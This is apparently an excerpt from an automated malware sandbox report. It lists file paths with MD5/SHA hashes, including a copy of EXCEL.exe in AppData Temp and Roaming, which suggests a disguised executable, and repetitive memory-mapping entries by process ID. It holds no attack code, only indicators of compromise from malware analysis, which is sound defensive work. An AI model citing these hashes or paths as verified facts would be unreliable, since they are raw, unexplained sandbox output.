        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        1a29e7e6ec1166a8848dd45e9d7c7f50

        SHA1

        92b4ca0de260a8246876662f2cd28f89d25c22f9

        SHA256

        58b8b0f2bbbb559809a4892dd0afd15c22b8290a649e5b0b1c5d4fa2e65fcb7c

        SHA512

        d48b5ce6760c3099875e3e33edd1c0b249dafdda8f92f80ca50a98b2362d912adef172d8c32e3b1f206e7f93d66663876b50296d3640d2325872bb71b34e4620

      • \??\PIPE\srvsvc
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • \??\PIPE\srvsvc
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • \??\PIPE\srvsvc
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • \??\PIPE\srvsvc
        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • \Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Local\Temp\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • \Users\Admin\AppData\Roaming\EXCEL.exe
        MD5

        4ef7b35bd9151fc5538c06ae79a0e2fc

        SHA1

        c45198609f71e795ccc9e5a2ec1ad3162141da76

        SHA256

        3e77ec2e0bbc394a1841bfb8f9b004f93fcbc35b401580abd01c92c41b6635aa

        SHA512

        aef9ad91b889f4c615dc278ebedc0017a32b3024fef812ae90929dac7c83a0cb4a41fcb26d4bee2588ffebf50745cdd9174a73e44b83db99fefccf6e9b18615d

      • memory/108-290-0x00000000004010B8-mapping.dmp
      • memory/560-317-0x0000000005420000-0x0000000005421000-memory.dmp
        Filesize

        4KB

      • memory/560-128-0x0000000000000000-mapping.dmp
      • memory/676-320-0x0000000000000000-mapping.dmp
      • memory/784-101-0x0000000006280000-0x0000000006281000-memory.dmp
        Filesize

        4KB

      • memory/784-103-0x00000000062C0000-0x00000000062C1000-memory.dmp
        Filesize

        4KB

      • memory/784-67-0x00000000049B0000-0x00000000049B1000-memory.dmp
        Filesize

        4KB

      • memory/784-70-0x0000000002500000-0x0000000002501000-memory.dmp
        Filesize

        4KB

      • memory/784-68-0x0000000004970000-0x0000000004971000-memory.dmp
        Filesize

        4KB

      • memory/784-71-0x0000000004950000-0x0000000004951000-memory.dmp
        Filesize

        4KB

      • memory/784-74-0x00000000056A0000-0x00000000056A1000-memory.dmp
        Filesize

        4KB

      • memory/784-83-0x0000000006170000-0x0000000006171000-memory.dmp
        Filesize

        4KB

      • memory/784-66-0x0000000002160000-0x0000000002161000-memory.dmp
        Filesize

        4KB

      • memory/784-89-0x000000007EF30000-0x000000007EF31000-memory.dmp
        Filesize

        4KB

      • memory/784-79-0x0000000005700000-0x0000000005701000-memory.dmp
        Filesize

        4KB

      • memory/784-69-0x0000000004972000-0x0000000004973000-memory.dmp
        Filesize

        4KB

      • memory/784-64-0x0000000000000000-mapping.dmp
      • memory/1160-164-0x0000000004A70000-0x0000000004A71000-memory.dmp
        Filesize

        4KB

      • memory/1160-165-0x0000000004A72000-0x0000000004A73000-memory.dmp
        Filesize

        4KB

      • memory/1160-143-0x0000000000000000-mapping.dmp
      • memory/1168-90-0x00000000049D0000-0x00000000049D1000-memory.dmp
        Filesize

        4KB

      • memory/1168-91-0x00000000049D2000-0x00000000049D3000-memory.dmp
        Filesize

        4KB

      • memory/1168-80-0x0000000000000000-mapping.dmp
      • memory/1240-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1240-63-0x0000000075B31000-0x0000000075B33000-memory.dmp
        Filesize

        8KB

      • memory/1240-61-0x0000000070911000-0x0000000070913000-memory.dmp
        Filesize

        8KB

      • memory/1240-60-0x0000000072E91000-0x0000000072E94000-memory.dmp
        Filesize

        12KB

      • memory/1396-230-0x0000000004912000-0x0000000004913000-memory.dmp
        Filesize

        4KB

      • memory/1396-229-0x0000000004910000-0x0000000004911000-memory.dmp
        Filesize

        4KB

      • memory/1396-212-0x0000000000000000-mapping.dmp
      • memory/1496-288-0x0000000001250000-0x00000000012C3000-memory.dmp
        Filesize

        460KB

      • memory/1496-123-0x0000000000000000-mapping.dmp
      • memory/1552-315-0x00000000004010B8-mapping.dmp
      • memory/1584-139-0x0000000000000000-mapping.dmp
      • memory/1584-156-0x0000000004992000-0x0000000004993000-memory.dmp
        Filesize

        4KB

      • memory/1584-162-0x0000000004900000-0x0000000004901000-memory.dmp
        Filesize

        4KB

      • memory/1584-153-0x0000000004990000-0x0000000004991000-memory.dmp
        Filesize

        4KB

      • memory/1592-261-0x0000000004B30000-0x0000000004B31000-memory.dmp
        Filesize

        4KB

      • memory/1592-262-0x0000000004B32000-0x0000000004B33000-memory.dmp
        Filesize

        4KB

      • memory/1592-234-0x0000000000000000-mapping.dmp
      • memory/1624-124-0x0000000000000000-mapping.dmp
      • memory/1624-129-0x0000000001390000-0x0000000001391000-memory.dmp
        Filesize

        4KB

      • memory/1624-284-0x0000000005910000-0x0000000005911000-memory.dmp
        Filesize

        4KB

      • memory/1836-243-0x0000000000000000-mapping.dmp
      • memory/1844-287-0x0000000000400000-0x000000000042C000-memory.dmp
        Filesize

        176KB

      • memory/1844-277-0x00000000004010B8-mapping.dmp
      • memory/1852-240-0x0000000004A32000-0x0000000004A33000-memory.dmp
        Filesize

        4KB

      • memory/1852-299-0x0000000000401364-mapping.dmp
      • memory/1852-222-0x0000000000000000-mapping.dmp
      • memory/1852-239-0x0000000004A30000-0x0000000004A31000-memory.dmp
        Filesize

        4KB

      • memory/1880-106-0x00000000020D0000-0x0000000002D1A000-memory.dmp
        Filesize

        12.3MB

      • memory/1880-82-0x0000000000000000-mapping.dmp
      • memory/1888-266-0x0000000000000000-mapping.dmp
      • memory/1888-286-0x00000000049D2000-0x00000000049D3000-memory.dmp
        Filesize

        4KB

      • memory/1888-283-0x00000000049D0000-0x00000000049D1000-memory.dmp
        Filesize

        4KB

      • memory/2000-155-0x00000000025C0000-0x00000000025C1000-memory.dmp
        Filesize

        4KB

      • memory/2000-154-0x00000000048D2000-0x00000000048D3000-memory.dmp
        Filesize

        4KB

      • memory/2000-152-0x00000000048D0000-0x00000000048D1000-memory.dmp
        Filesize

        4KB

      • memory/2000-149-0x0000000004910000-0x0000000004911000-memory.dmp
        Filesize

        4KB

      • memory/2000-137-0x0000000000000000-mapping.dmp
      • memory/2032-300-0x0000000000401364-mapping.dmp
      • memory/2032-247-0x0000000000000000-mapping.dmp
      • memory/2036-273-0x0000000000000000-mapping.dmp